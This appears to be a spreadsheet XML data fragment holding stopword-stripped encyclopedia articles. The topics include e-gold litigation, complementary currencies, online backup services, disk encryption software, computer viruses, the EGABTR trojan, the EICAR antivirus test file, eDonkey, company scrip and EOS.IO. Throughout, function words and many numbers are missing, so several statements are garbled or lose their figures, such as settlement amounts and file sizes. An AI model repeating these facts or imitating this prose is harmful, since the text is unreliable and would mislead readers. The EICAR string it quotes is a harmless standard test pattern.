petitioners allege government intentionally withheld exculpatory evidence brady disclosure would resulted defendants declining enter plea agreements counts indictment informed court’s ruling defendants’ motion dismiss money transmitter specific counts indictment them.specifically, petitioners allege business substantially similar e-gold advised district columbia department insurance, securities, banking require money transmitting license pursuant d.c. law, causing petitioners realize government misrepresented applicability state money transmitting laws e-gold. petitioners allege resulted public records requests yielded evidence government instructed florida office financial regulation refrain issuing publishing legal opinion neither companies money transmitters florida pendency grand jury investigation companies. also references external links official website</t>
  </si>
  <si>
    <t>Complementary currency</t>
  </si>
  <si>
    <t>complementary currency currency medium exchange necessarily national currency, thought supplementing complementing national currencies.: complementary currencies usually legal tender based agreement parties exchanging currency. according jérôme blanc laboratoire d'économie firme institutions, complementary currencies protect, stimulate orientate economy.: they also used advance particular social, environmental, political goals.: when speaking complementary currencies, number overlapping often interchangeable terms use: local community currencies complementary currencies used within locality form community (such business-based online communities); regional currencies similar local currencies, used within larger geographical region; sectoral currencies complementary currencies used within single economic sector, education health care. many private currencies complementary currencies issued private businesses organizations. other terms include alternative currency, auxiliary currency, microcurrency. mutual credit form alternative currency, thus form lending banking system considered form alternative currency. barters another type alternative currency. these actually exchange systems, trade items, without currency whatsoever. finally, lets special form barter trades points items. point stands worker-hour work, thus time-based currency. purposes current complementary currencies often designed intentionally address specific issues, example increase financial stability. most complementary currencies multiple purposes and/or intended address multiple issues. they useful communities access financial capital, adjusting peoples' spending behavior. 2006 annual report worldwide database complementary currency systems presented survey complementary currency systems respondents said "all reasons" selected, among cooperation, micro/small/medium enterprise development, activating local market, reducing need national currency, community development.aims include: resocialisation emancipation lifeboat currencies increase financial stability reduce carbon emissions, encouraging localisation trade relationships encouraging under-used resources: recognise informal economy promote local businesses advantages some complementary currencies intentionally devalue rapidly (they called schwundgeld); increases monetary circulation. miracle wörgl event showed potential increased spending introduction local currency known freigeld. local currencies also benefit cannot spent abroad, thus money always keeps circulating locally, benefiting local economy. alternative currencies reported work counterbalance local economy. they increase activity local economy slows down, decrease activity local economy goes up.as commercial tool within business, opposed geographical social tool, complementary currency open business preferred source marketplace whereby sell otherwise devalued worthless spare capacity exchange complementary currency. selling spare capacity (empty hotel rooms utilised staff hours blank diary slots excess stock) business able harness otherwise lost value gaining benefits improved profits; stronger balance sheet; enhanced cash flow; customers growth market share. disadvantages complementary currencies promoted local currencies cannot spent outside community limited use.according professor nikolaus läufer's theory, local currencies freigeld increase economic activity temporarily. lengthy local currency ultimately result decline economic activity lead destabilization economy. this increased circulation velocity money amount circulation decreases currencies freigeld reduce value rapidly). often issues related paying tax. some complementary currencies considered tax-exempt, fully taxed national currency, caveat must paid national currency. legality tax-status complementary currencies varies widely country country; systems countries would illegal others. types complementary currencies describe wide group exchange systems, currencies scrips designed used combination standard currencies complementary currencies. they valued exchanged relationship national currencies also function media exchange own. complementary currencies outside nationally defined legal realm legal tender used such. rate exchange, scope circulation combination currencies differs greatly complementary currency systems, case national currency systems. some complementary currencies incorporate value scales based time backing real resources (gold, oil, services, etc.). time-based currency valued time required perform service hours, notwithstanding potential market value service. another type complementary monetary systems barter, exchange specific goods services performed without currency. 1982, widespread auxiliary currency system, local exchange trading systems, created. regulates exchange goods services members cooperative. examples investment system complementary currency automatic social financial network (asfn) international crowdsourcing crowd-funding community evolution whose members complementary virtual currency "сyber-gold". introductory paid association members subsequently directed toward investments variety commercial projects. some complementary currencies take advantage demurrage fees, intentional devaluation currency time, like negative interest. this stimulates market exchanges devaluating currency, propagates participation currency system forces storage wealth (hoarding) ability usually reserved currency permanent better value-holding tools like property, improvement, education, technology, health, equity securities, etc., sheltered currency-based demurrage fees. other experimental complementary currencies high interest fees promote heavy competition participants, removal wealth long term wealth holding structures (natural/material wealth, property, etc.) process rapid industrialization, mass production, automation competitive innovation.monetary speculation gambling usually outside design parameters complementary currencies. complementary currencies often intentionally restricted regional spread, time validity sector require membership participating individuals points acceptance. there complementary currencies regional global, community exchange system, friendly favors, tibex lazio region italy proposed global currency terra.a community currency type complementary currency explicit support build equal, connected sustainable societies. community currency designed used specific group.since advent bitcoin january 2009, cryptocurrency increased substantially alternative currency. cryptocurrency allows trustless means exchange decentralized mining, computers solve mathematical puzzles first order verify transaction. this solves problem sender receiver requiring third party bank order successfully complete transaction. also poses challenge governments comes confiscation cryptocurrency since private keys retained owner cryptocurrency. unless keys divulged, owner retains complete control crypto. other successful cryptocurrencies frequently used alternative currencies include monero, bitcoin cash, zcash, dash, many others. activists some complementary currency activists belgian ex-banker bernard lietaer, british economist hazel henderson, dutch stro-director henk arkel developed cyclos, qoin initiators edgar kampers hilten, paul glover ithaca hours, margrit kennedy monneta, letsystem inventor michael linton, time banking inventor edgar cahn, japanese volunteer labour network founder teruko mizushima, complementary currency resource center coordinator stephen demeulenaere many others. lietaer argued world's national currencies inadequate world's business needs, citing countries experienced major currency crashes 20-year period, arguing complementary currencies protect problems. lietaer also spoken international reciprocal trade association (irta) conference barter. list complementary currencies other non-regional complementary currencies include: also references further reading glover, paul. hometown money: enrich community local currency. greenplanners, 2013. lietaer, bernard. future money. random house, 2001. raddon, community money: women making change. montreal: black rose books, 2003. suhr, dieter (1990). neutral money network (neumone): critical analysis traditional money financial innovation "neutral money" external links community currency magazine international journal community currency research online database complementary currencies worldwide social trade organisation secure exchange protocols archived 2020-08-13 wayback machine trade point: internal currency barter platform alternative monetary systems curlie</t>
  </si>
  <si>
    <t>Comparison of online backup services</t>
  </si>
  <si>
    <t>this comparison online backup services. online backup special kind online storage service; however, various products designed file storage features characteristics others designed backup have. online backup usually requires backup client program. browser-only online storage service usually considered valid online backup service. online folder sync services used backup purposes. however, online folder sync services provide safe online backup. file accidentally locally corrupted deleted, depends versioning features folder sync service, whether file still retrievable. comparison legend windows/linux/mac/ios/android/blackberry: supported operating systems thick client (native binary application), provide background data transmission setting services. zero knowledge: service provider knowledge user's encryption key, ensuring privacy backup data. secure management: yes, user holds controls encryption key. service provider holds controls encryption key. payment options/plans: limited plan: computer. additional storage threshold. unlimited plan: computer. storage computer unlimited. $/mb plan: unit storage, unlimited computers share storage. cloud hosted drive: cloud serve storage webdav, smb/cifs, nfs, protocol, allowing files streamed cloud. change made cloud immediately accessible applications clients without needing pre-download (sync) file full. sync: synchronization computers, and/or mobile devices (pda, mda,...) public internet file hosting restore physical media server location: countries physical servers located. where data located. still beta version whether desktop client available) detect upload changes without scanning files. many backup services offer limited free plan, often personal use. often possible increase free backup limit coupons, referrals, means included column. this column also include free trials available limited period time. external hard drive support: refer alternate backup destination whether service back external drives. hybrid online backup works storing data local disk backup captured high speed, either backup software d2d2c (disk disk cloud) appliance encrypts transmits data service provider. recent backups retained locally, speed data recovery operations. unlimited bandwidth capping limits used accounts. comments acronis five pcs, always incremental backups, remote access backblaze data de-duplication; block-level incremental. barracuda backup service data de-duplication; real-time hybrid on-site/off-site data back-up. bullguard backup pc/license, fast upload speeds, mobile access, encrypted transfer storage, password-protected settings, free 24/7 support. carbonite block-level incremental, home editions. iphone/ blackberry/ android available remotely access data online backup (for pro: users computer backed available administrator pro). manually select files upload larger cloudberry backup image file based backups, data de-duplication, block-level multiple cloud providers supported. cloudjuncxion decentralized multi-cloud backup integrated sharing, sync, backup, cloud nas. fault-tolerance failure constituent cloud. crashplan unlimited destinations. data de-duplication; block-level incremental. server-free, exchanging backup space friends family. datashield high-level encryption, personalized encryption key, shared cloud drive, sync folder functionality dolly drive cloud storage specifically designed mac. also allows users store files exclusively cloud seamless access computer mobile device. diino iphone/android available. dropbox data de-duplication, delta sync, iphone/android/blackberry available. dropmysite website backup, database backup, sftp support, free egnyte delta sync, google docs sync, user group management elephantdrive auto-transfer defunct xdrive. f-secure [steek acquired f-secure july 2009] humyo humyo acquired trend micro become part trend micro safesync. humyo longer accepts clients. iaso backup advanced data reduction technology. data de-duplication mechanism. high level scalability cost effectiveness. icfiles secure file share storage. proprietary license download client. high level security, type 27001,27017, 27018, csa, pci, hipaa, cjis, model clauses, request private servers fisma fedramp. idrive proprietary license download client. automatic selection. continuous data protection. "virtual drive" explorer. jungle disk proprietary license download client sample code. keepvault real-time hybrid on-site offsite data backup. memopal cross-user de-duplication, delta sync. mimedia initial seed mimedia-owned external hard drive available extra cost, shipping included). mozy data de-duplication; block-level incremental. "mozy data shuttle" physical seeding service available extra fee. replicalia professional backup professional data. spideroak data de-duplication."zero knowledge" encryption. storegrid cloud byte-level incremental backup, local backup, disk image backup—bmr physical seeding. syncplicity google docs sync, central management business console. tanibackup (cheap backup) standard package. extensible single account. access smb/cifs (including sftp, scp, rsync on). month. tarsnap client source available; data de-duplication; block-level incremental. teamdrive store encrypted data webdav server; supports working offline; files commented; built-in support conflict resolution. unitrends vault2cloud data de-duplication; hybrid off-premises data backup; physical seeding. updatestar online backup data de-duplication; block-level incremental. usenet backup method storing backup data usenet. windows live mesh replaces windows live sync windows live folder. zetta enterprise-grade online backup supports linux, windows, high speed optimization, certified data centers. zmanda cloud backup available german japanese languages, supports server, exchange, sharepoint, mysql database, system state, oracle. versioning changes undone, files undeleted. acronis supports detailed history changes files browsing date version number. backblaze versions files kept days default; one-year forever retention optional. versioning included paid subscription carbonite keeps versions three months. keeps version past week, version previous three weeks, version previous months file backed versioning available computers only; available mac. cloudjuncxion supports multiple versions less week old, version less weeks old, version less month old, version older month. crashplan options: all, staged (daily, weekly, etc.). cubby previous versions deleted files kept explicitly removed user user runs space. deleted files previous versions count towards storage limit. dolly drive yes. keeps unlimited versions files. dropbox default, dropbox saves history deleted earlier versions files days dropbox accounts. dropmysite provides incremental backups ability download every snapshot. elephantdrive number versions kept amount time. google drive versions files kept days revisions. revisions automatically deleted. iaso backup versions files kept different periods time, starting month year more. icfiles files kept delete, auto delete clears every hours. idrive versions files kept forever (until explicitly removed). mozy version files kept days. days, enterprise days. powerfolder five versions kept online. client configurable many versions store locally. online backup (infrascale) versions kept. only largest counts towards storage limit. spideroak versions kept. files undeleted. sugarsync five versions kept. only recent version existing files well deleted files count towards storage limit. sync.com sync.com saves history deleted earlier versions files, days free accounts, indefinitely premium plans. syncplicity versions files, well deleted files, kept days. configurable business enterprise-class services. teamdrive previous versions kept restored. tresorit versioning included paid subscription zetta enterprise-grade online backup versions kept. files undeleted. other features limitations other notable limitations features. baidu cloud must registered verified phone first. performance degrades 10,000 files sync folder. technical limit 40,000 files sync folder. does sync .tmp files, outlook files, hidden files (hidden folders synced), file folder \/*?":&lt;&gt;| name. cloudjuncxion decentralized fragment-and-disperse storage across collection heterogeneous clouds maximal security. supports virtual private cloud model complete control enterprise customer. supports sync groups greater control synchronization files across multiple devices. dropbox performance degrades 300,000 files sync folder. this soft limit. sugarsync limited 80,000 files level sync folder. workaround, create multiple syncing folders, level folder limited files. also, microsoft outlook apple itunes databases unsupported. trustbox 3-layer encrypted storage supports privacy unlimited file version retrieval. restore file point time. defunct services bitcasa closed services february 2017. copy discontinued 2016 dell datasafe discontinued june 2015. drop.io mozy, shutdown 2019, redirects users carbonite norton zone discontinued july 2014. streamload mediamax ubuntu discontinued june 2014. windows live mesh wuala discontinued november 2015. xdrive zumodrive also file hosting service remote backup service comparison online music lockers comparison file synchronization software comparison file hosting services cloud storage shared disk access file sharing list backup software references</t>
  </si>
  <si>
    <t>E4M</t>
  </si>
  <si>
    <t>encryption masses (e4m) free disk encryption software windows windows families operating systems. discontinued; longer maintained. author, former criminal cartel boss paul roux, joined shaun hollingworth (the author scramdisk) produce commercial encryption product drivecrypt security company securstar. popular source-available freeware program truecrypt based e4m's source code. however, truecrypt uses different container format e4m, makes impossible programs access encrypted volume created other. allegation stolen source code shortly truecrypt version released february 2004, truecrypt team reported receiving emails wilfried hafner, manager securstar, claiming paul roux stolen source code securstar employee. according truecrypt team, emails stated roux illegally distributed e4m, authored illegal license permitting anyone base derivative work distribute freely, hafner alleges roux right claiming versions always belonged securstar. time, truecrypt team stop developing distributing truecrypt. also on-the-fly encryption (otfe) disk encryption disk encryption software comparison disk encryption software references external links archived version official website</t>
  </si>
  <si>
    <t>Comparison of disk cloning software</t>
  </si>
  <si>
    <t>this partial comparison list disk cloning software, computer programs copy contents disk another disk disk image. also lists: list backup software list data recovery software list disk partitioning softwarecomparison: comparison disc image softwaresoftware: partclone partition clone restore tool works almost filesystem. creators base clonezilla. systemrescue includes partimage, partclone, ntfsclone fsarchiver notes references</t>
  </si>
  <si>
    <t>Comparison of cryptographic hash functions</t>
  </si>
  <si>
    <t>following tables compare general technical information number cryptographic hash functions. individual functions' articles information. this article all-inclusive necessarily up-to-date. overview hash function security/cryptanalysis found hash function security summary. general information basic general information cryptographic hash functions: year, designer, references, etc. parameters notes compression function following tables compare technical information compression functions cryptographic hash functions. information comes specifications, please refer details. notes also list hash functions hash function security summary word (computer architecture) references external links ecrypt benchmarking cryptographic hashes measurements hash function speed various platforms ecrypt hash function website wiki cryptographic hash functions sha-3 project information sha-3 competition</t>
  </si>
  <si>
    <t>Comparison of computer viruses</t>
  </si>
  <si>
    <t>compilation unified list computer viruses made difficult naming. fight computer viruses types malicious software, many security advisory organizations developers anti-virus software compile publish lists viruses. when virus appears, rush begins identify understand well develop appropriate counter-measures stop propagation. along way, name attached virus. developers anti-virus software compete partly based quickly react threat, usually study name viruses independently. time virus identified, many names denote virus. another source ambiguity names sometimes virus initially identified completely virus found variation earlier known virus, cases, often renamed. example, second variation sobig worm initially called "palyh" later renamed "sobig.b". again, depending quickly happens, name persist. scope terms scope, major variants: list "in-the-wild" viruses, list viruses active circulation, lists known viruses, also contain viruses believed active circulation (also called "zoo viruses"). sizes vastly different: in-the-wild lists contain hundred viruses full lists contain tens thousands. comparison viruses related programs related lists list computer worms timeline computer viruses worms unusual subtypes palm viruses hypercard viruses linux malware notable instances conficker creeper virus first malware arpanet iloveyou leap trojan horse shamoon wiper virus stolen digital certificates destroyed 35,000 computers owned saudi aramco. storm worm windows trojan horse forms storm botnet stuxnet first destructive ics-targeting trojan destroyed part iran's nuclear program. virus destroyed centrifuge components making impossible enrich uranium weapons grade. similar software adware malware spamming spyware computer worm trojan horse security topics antivirus software computer insecurity cryptovirology security obscurity cyberwarfare also computer worm spyware virus hoax zombie computer references external links wildlist, wildlist organization international list computer viruses listing latest viruses symantec. list viruses viruses cataloged panda security's collective intelligence servers.</t>
  </si>
  <si>
    <t>ECache</t>
  </si>
  <si>
    <t>ecache digital gold currency (dbc) provider operated network 2007–2014. ecache completely anonymous like physical cash. ecache mint issues certificates store transaction details personally identifiable information requested mint user. references magazine interview ecache's operators</t>
  </si>
  <si>
    <t>Comparison of antivirus software</t>
  </si>
  <si>
    <t>this non-exhaustive list notable antivirus internet security software, form comparison tables, according platform (e.g. desktop, mobile, server, etc.) operating systems (e.g. windows, macos, linux, solaris, android, ios, ubuntu touch, windows phone, etc.). legend term "on-demand scan" refers possibility performing manual scan user) entire computer/device, "on-access scan" refers ability product automatically scan every file creation subsequent modification. term "cloudav" refers ability product automatically perform scans cloud. term "email security" refers protection emails viruses malware, "antispam" refers protection spam, scam phishing attacks. term "web protection" usually includes protection from: infected malicious urls, phishing websites, online identity (privacy) protection online banking protection. many antivirus products "third-party antivirus engine". this means antivirus engine made another producer; however, malware signature and/or parts product not) done owner product itself. desktop computers servers windows macos linux solaris freebsd mobile (smartphones tablets) android windows mobile this list excludes windows phone windows phone support running protection programs. symbian blackberry also antivirus software av-comparatives austrian organization testing antivirus security software av-test german organization testing antivirus security software comparison firewalls international computer security association internet security list computer viruses virus bulletin references</t>
  </si>
  <si>
    <t>EDonkey network</t>
  </si>
  <si>
    <t>edonkey network (also known edonkey2000 network ed2k) decentralized, mostly server-based, peer-to-peer file sharing network created 2000 developers mccaleb yagan best suited share files among users, provide long term availability files. like sharing networks, decentralized, central network; also, files stored central server exchanged directly users based peer-to-peer principle. server part network proprietary freeware. there families server software ed2k network: original metamachine, written c++, closed-source proprietary, longer maintained; eserver, written also closed-source proprietary, although available free charge several operating systems computer architectures. eserver family currently active development support, almost ed2k servers 2008 server software. there many programs client part network. most notably, edonkey2000, original client metamachine, closed-source freeware, longer maintained popular day; emule, free program windows written visual licensed gpl. original ed2k protocol extended subsequent releases eserver emule programs, generally working together decide features ed2k protocol support. however, ed2k protocol formally documented (especially current extended state), said practice ed2k protocol emule eserver together running, also emule clients communicate among themselves. emule open source, code freely available peer-review workings protocol. examples ed2k protocol extensions "peer exchange among clients", "protocol obfuscation" support files larger gigabytes, etc. ed2k client programs, given time, generally follow suit adopting protocol extensions. edonkey client programs connect network share files. edonkey servers communication hubs clients, allowing users locate files within network. clients servers available windows, linux, unix-like operating systems. running edonkey server program machine connected internet, user server network. number servers addresses change frequently, client programs update server lists regularly. features hash identification files edonkey network uniquely identified using root hash hash list file. this treats files identical content different names same, files different contents name different. files divided full chunks 9,728,000 bytes (9500 kib) plus remainder chunk, separate 128-bit checksum computed each. that way, transmission error detected, chunk corrupted instead whole file. furthermore, valid downloaded chunks available sharing rest file downloaded, speeding distribution large files throughout network. file's identification checksum computed concatenating chunks' checksums order hashing result. cryptographic terms, list checksums hash list, file identification checksum root hash, also called hash master hash. possible malicious user create different chunks checksum vulnerable collision attacks. search edonkey network supports searching files name number secondary characteristics size, extension, bitrate, etc. lugdunum versions eserver (edonkey server software) support complex boolean searches like 'one (three four) ("five four three" "two one") seven'. ease file searching, websites list checksums sought-after files form ed2k link. some websites also lists active servers users update. history 2004, edonkey network overtook fasttrack become widely used file sharing network internet. while figures vary hour hour, believed, mid-2005, host average approximately three million users sharing million billion files servers. network’s popular server time razorback2, usually hosted million users. sometime around february 2006, razorback2 servers raided seized federal belgian police. donkeyserver donkeyserver currently combine half million users. however, around july 2007, servers together several others shut temporary injunction issued.by 2007, bittorrent overcome edonkey network widely used file sharing network internet. 2009, reported edonkey still popular protocol, rapidly declining. successor protocols original edonkey network relied central servers users willing donate necessary bandwidth processing/disk usage overhead. such servers could subject heavy traffic and, consequently, vulnerable attacks. overcome problem, metamachine, developer original edonkey client, developed overnet successor edonkey protocol. emule project also developed kademlia network (called kad) overcome reliance central servers. addition, emule includes pure client source-exchange capability, allowing client ‘high incoming ed2k connections blocked firewall) continue downloading (and uploading) files high number sources days, even complete disconnection original ed2k servers handled original requests. (emule query secondary servers told disconnect server). this source-exchange capability designed reduce load servers thirds files large number seeds, sources (other clients) files. original edonkey client metamachine support source exchanges. legal action legal action edonkey 2000 september 2006, metamachine inc., developer edonkey2000 client, agreed million avoid potential copyright infringement lawsuits brought riaa. accordance agreement, edonkey discontinue distribution software well take measures prevent previous copies software file sharing. confiscation razorback razorback2 server edonkey network, known able handle million users simultaneously. february 2006, several servers (including razorback2), located belgian datacenter, confiscated belgian police, operator, lives switzerland, arrested. this done local judge authorized confiscation datacenter zaventem near brussels, denouncement motion picture association america (mpaa), collaboration international federation phonographic industry. mpaa chairman glickman, described raid "major victory": this major victory fight supply illegal materials circulated internet peer-to-peer networks. shaving illegal traffic copyrighted works facilitated razorback2, depleting illegal networks ability supply internet pirates copyrighted works positive step international effort fight piracy. besides razorback's equipment confiscated site shut down, copyright enforcement entities mpaa ifpi several "razorback2" fake servers online, purpose mimicking original servers yield useful results, hampering file-sharing traffic. afterwards, swiss anti-piracy tech firm logistep hired help intimidate prosecute filesharing users. edonkey poisoning servers appeared edonkey network censor shared content searches information files type file (such video mp3) keywords. these servers report large numbers users million) connected them, thus raising number users network 10—13 million; however, impossible determine many people actually connected them. such servers often disseminate advertisements disguised commonly searched-for music/video files. server software main server software used ed2k network known lugdunum server. created reverse engineering edonkey protocol redesigned scratch. (metamachine abandoned development ed2k server software revealed source code lugdunum late 2002, never used). lugdunum extended ed2k protocol maintaining backward compatibility. lugdunum server software gratis, open source. stated reason opening source prevent easy creation fake servers prevent attacking server itself. september 2007, server software announced emule site forums, called satan-edonkey-server. given shut major emule servers legal action days earlier, server accepted suspicion. feared software transmit information clients unknown third parties. some trusted emule developers received source code satan-edonkey-server stated spy-code built satan server software created reverse engineering edonkey protocol. software comes versions (c++ java). satan-edonkey-server software also gratis. java version server side found [1], written 2012. client software numerous clients, including several free software, available edonkey/edonkey2000 network: amule: successful fork lmule, fully copied interface feel emule, shares code emule project. edonkey2000: original metamachine client, since discontinued emule: free windows client, also linux (under wine); numerous mods also available emule plus free (gpl) windows client loosely based emule, obfuscation support adding features automated fake checks enhanced gui. emule plus direct association original emule. hydranode: free, multi-network, cross-platform, core-gui-separated client imule: anonymous emule using network jmule: free open source multi platform java client. jubster: multi-network client windows lmule (linux mule): edonkey client based emule, targeted linux platforms. lphant: edonkey bittorrent, cross-platform, core-gui-separated client runs microsoft .net mono platforms eant: successful fork lphant significative improvements made keep source code open. currently inactive. mldonkey: free, multi-network, cross-platform client morpheus: file sharing client windows pruna (formerly, mediavamp): korean-language client based emule shareaza: free open source multi-network file-sharing client supports gnutella2 gnutella networks, well bittorrent protocol, additionally ed2k. allows network-spanning search content browser integration operate download manager. supports user profiles, remote file browsing, chat advanced search filtering. xmule (x11 mule): fork lmule. deviating copying emule, controls lmule less user-friendly. discontinued january 2009. qmule: multi-protocol, cross-platform client edonkey bittorrent networks. based libed2k, libtorrent-rasterbar tools libraries libed2k: cross platform edonkey protocol library. inspired libtorrent_rasterbar. also comparison file-sharing applications network overnet references external links pdonkey project edonkey protocol description lugdunum backup edonkey server peerates.net servers list avoid faked, scammed false edonkey servers poisoning methods anti-piracy firms work edonkey network "main page docuwiki". docuwiki.net. retrieved october 2016.</t>
  </si>
  <si>
    <t>Comparison of anti-plagiarism software</t>
  </si>
  <si>
    <t>following tables compare software used plagiarism detection. general references</t>
  </si>
  <si>
    <t>EGABTR</t>
  </si>
  <si>
    <t>egabtr (ega enhanced graphics adapter), sometimes pronounced "eggbeater", trojan horse program achieved level notoriety late 1980s early 1990s. allegedly graphics utility would improve quality display, actually malware deleted file allocation tables hard drive. this deletion accompanied text message reading "arf! arf! you!". coverage virus translated languages german, chinese indonesian. various sources disagree exact wording. 1980s, richard streeter, executive, downloaded trojan virus, learned egabtr visiting electronic bulletin boards, hoping find something improve operating system unknowingly downloaded virus. references external links google books</t>
  </si>
  <si>
    <t>EICAR test file</t>
  </si>
  <si>
    <t>eicar anti-virus test file eicar test file computer file developed european institute computer antivirus research (eicar) computer antivirus research organization (caro), test response computer antivirus (av) programs. instead using real malware, could cause real damage, test file allows people test anti-virus software without real computer virus.anti-virus programmers eicar string verified virus, similar identified signatures. compliant virus scanner, detecting file, respond less manner found harmful virus. virus scanners compliant, detect file even correctly configured. neither file detected wording flagged standardized, differ real malware flagged, prevent executing long meets strict specification european institute computer antivirus research.the eicar test string versatile straightforward detection: file containing eicar test string compressed archived, antivirus software whether detect test string compressed file. many amtso feature settings checks based eicar test string. design file text file bytes legitimate .com executable file (plain machine code) ms-dos, work-alikes, successors os/2 windows (except 64-bit 16-bit limitations). when executed, eicar test file print "eicar-standard-antivirus-test-file!" stop. test string written noted anti-virus researchers padgett peterson paul ducklin engineered consist ascii human-readable characters, easily created using standard computer keyboard. makes self-modifying code work around technical issues constraint imposes execution test string.the eicar test string reads x5o!p%@ap[4\pzx54(p^)7cc)7}$eicar-standard-antivirus-test-file!$h+h* third character capital letter 'o', digit zero. string's hash values bytes without trailing newline character) follows: adoption developers anti-virus software, malwarebytes, said eicar test file database, "adding fake malware test files like eicar database takes time away malware research, proves nothing long run".according eicar's specification, antivirus detects test file starts 68-byte test string bytes long. result, antiviruses expected raise alarm document containing test string. test file still used malicious purposes, exploiting reaction antivirus software: race condition involving symlinks cause antiviruses delete themselves. qr-encoded eicar test file crashes cctv systems. also gtube similar test unsolicited bulk email (email spam) references external links official website (also known european expert group it-security) examination eicar's standard test program assembly-language analysis eicar test file virustotal antivirus results scanning eicar file "the misuse test files anti-malware testing". anti-malware testing standards organization. archived original august 2017.</t>
  </si>
  <si>
    <t>Company scrip</t>
  </si>
  <si>
    <t>company scrip scrip substitute government-issued legal tender currency) issued company employees. exchanged company stores owned employers. united kingdom, truck systems long formally outlawed truck acts. united states, payment scrip became illegal 1938 part fair labor standards act.in united states, mining logging camps typically created, owned operated single company. these locations, quite remote, often cash poor; even ones not, workers paid scrip little choice purchase goods company store, exchange currency, even available, would exhaust value exchange fee. with economic monopoly, employer could place large markups goods, making workers dependent company, thus enforcing employee "loyalty". while scrip exclusive coal industry, estimated percent scrip used coal companies kentucky, virginia, west virginia. because this, many derived nicknames type currency originated appalachian mining communities, "flickers," "clackers," "dugaloos."tokens made variety metals, including brass, copper, zinc, nickel. there additionally "compressed fibre" coins produced world effort conserve metals wartime production. lumber company scrip 19th century united states forested areas, cash often hard come this particularly true lumber camps, workers commonly paid company-issued scrip rather government issued currency.in wisconsin, example, forest-products lumber companies specifically exempted state requiring employers workers' wages cash. lumber timber companies frequently paid workers scrip redeemable company store. company-run stores served convenience workers families, also allowed companies exploit workers increased profit. certain cases, employers included contract provisions requiring employees patronize company stores. employees wanted change scrip cash generally discount.lumber company scrip redeemable lumber well merchandise. according wisconsin historical society, option appealed settlers region, worked lumber camps winter earn enough money establish farm. taking wages lumber helped build much-needed house barn. coal company scrip coal scrip "tokens paper monetary value issued workers advance wages coal company designated representative". such, coal scrip could used specific locality coal town company named. because coal scrip used context coal town, usually retail establishments specific remote location, employees used could redeem value specific location. retail establishments, constituted monopoly. coal town established out-of-state corporations fueled cheap labor provided european immigrants came appalachia search work growing coal industry.the coal scrip dates late 1800s coal companies looked increase profits (although stated reason using scrip eliminate keeping large cash reserves). rather receiving compensation united states currency, many miners received payment entirely scrip, could used store owned coal company (called company store), eliminating prospects acquiring generational wealth. coal companies would also advance miners wages scrip, would wages advances form early payday loans). result situation miners perpetually debt employer, receiving "advance unearned wages." moreover, company store often place spend scrip, company could charge exorbitant prices rural communities compared prices major cities. there uniform design, coin generally identified location coal company town predominantly featured words "non-transferrable" communicate recipients could transferred u.s. currency.coal scrip deemed unconstitutional non-transferable early twentieth century, continued exist kentucky west virginia officially outlawed congress 1967. much lack generational wealth coal country west virginia eastern kentucky today traced inability acquire personal wealth coal towns previous century. country musician merle travis, album folk songs hills, makes reference coal scrip song "sixteen tons", made famous tennessee ernie ford. wartime from 1914 1924, following first world war, variety forms german scrip issued, including notgeld, lagergeld, gutscheine serienscheine. such currencies issued principalities, german colonial governments, cities, large corporations, small businesses, prisoner-of-war camps, cases, individuals." modern practice practice documented recently 2019. september 2008, mexican supreme court justice ruled walmart mexico, mexican subsidiary walmart, must cease paying employees part vouchers redeemable walmart stores. 2019, washington post published article highlighting amazon's system "gamification", rewards employees complete high numbers orders swag bucks game-like system, used amazon-themed merchandise. also company town truck system private currency references external links harte, c.j. "coal mine scrip collectors meet". middlesboro daily news. archived original january 2013. retrieved july 2012. cawood, steve, past president national scrip collectors associationscrip definition</t>
  </si>
  <si>
    <t>CompanionLink</t>
  </si>
  <si>
    <t>companionlink contact calendar synchronization software syncs data across smartphone tablet devices, computers, web-based applications. software developed portland, or-based companionlink software, inc. companionlink software, inc. also develops dejaoffice—contact management mobile android, iphone, blackberry, windows phone—and secure cloud-based sync service called dejacloud.companionlink software, inc. recognized developing first 3rd-party synchronization tools palmpilot, blackberry, iphone, android devices. companionlink software best known wide range devices compatible with. wayland bruns founder current ceo. history wayland bruns founded companionlink, inc. 1987. originally named jorf company, becoming tele-support software, inc. 1996, companionlink software, inc. june 2000. 2011, company employed people reported annual revenues exceeding million.companionlink first 3rd-party synchronization tools palmpilot, blackberry, iphone, android devices. company continues evolve products current platforms, operating systems, software.in august 2010, companionlink software, inc. released companionlink updated user interface faster sync support. year later, september 2011, companionlink announced public beta testing period. company’s dejaoffice product released 2010, followed dejacloud 2012. products companionlink syncs contacts, calendars, tasks, memos multiple databases devices direct connection wireless connection. works microsoft outlook, palm desktop, act!, salesforce crm, zoho crm, lotus notes, google contacts calendar, google apps, outlook business contact manager, highrise, groupwise, infusionsoft.dejaoffice contact customer relationship management mobile application designed business users. synchronizes contacts, calendars, tasks, memo apps apple, android, blackberry, windows phone smartphones tablets. dejaoffice comes productivity apps offers usb, wi-fi, cloud sync options. dejaoffice makes getting things done approach, allows focus attention taking action tasks, instead recalling them.cloud syncing companionlink software available dejacloud. dejacloud business cloud service keeps multiple databases devices synchronized using secure aes-256 encryption. external links http://www.companionlink.com/ references http://www.fwrd.com.au/</t>
  </si>
  <si>
    <t>EOS.IO</t>
  </si>
  <si>
    <t>eos.io blockchain protocol based cryptocurrency eos. smart contract platform claims eliminate transaction fees also conduct millions transactions second. history based white paper published 2017, eosio platform developed private company block.one released open-source software june 2018. order ensure widespread distribution native cryptocurrency launch blockchain, billion tokens distributed erc-20 tokens block.one. this provided distribution allow anyone launch blockchain software released. block.one, brendan blumer, announced block.one would support eosio blockchain billion funding token sale ultimately block.one raised four billion support blockchain initial coin offering (ico) period.the original test net, dawn 1.0, released september 2017, test versions dawn released december 2017, dawn january 2018, dawn 2018. name cryptocurrency comes ancient greek ἠώς, "dawn".eosio's dawn launched eosio mainnet june 2018, currently operating version 2.1.0.in september 2019, block.one agreed settle u.s. securities exchange commission charges related billion unregistered million penalty. settlement require restitution offer, registration tokens, disqualifications.block.one cayman islands registered company offering tokens. daniel larimer technical director (cto) recognized role building bitshares decentralized crypto exchange (dex)], building steemit decentralized social media platform) brainchild decentralized autonomous company (dac dao, decentralized autonomous corporation/organisation). block.one, eosio ecosystem everipedia block.one company registered cayman islands, began offering tokens june 2017 public, raising billion record ico). daniel larimer chief technology officer block.one. larimer previously worked decentralized exchange bitshares 2013 2016. after that, worked steemit, blockchain-based social media platform. january 2021, larimer announced resignation block.one.on december 2017, everipedia, for-profit, wiki-based online encyclopedia, announced plans using blockchain technology work airdrop cryptocurrency called encourage generating information. tokens intended exchangeable bitcoin. goals company stop certain countries blocking content, integration blockchain model. goal everipedia decentralized hosted eosio platform, countries turkey iran block wikipedia longer able 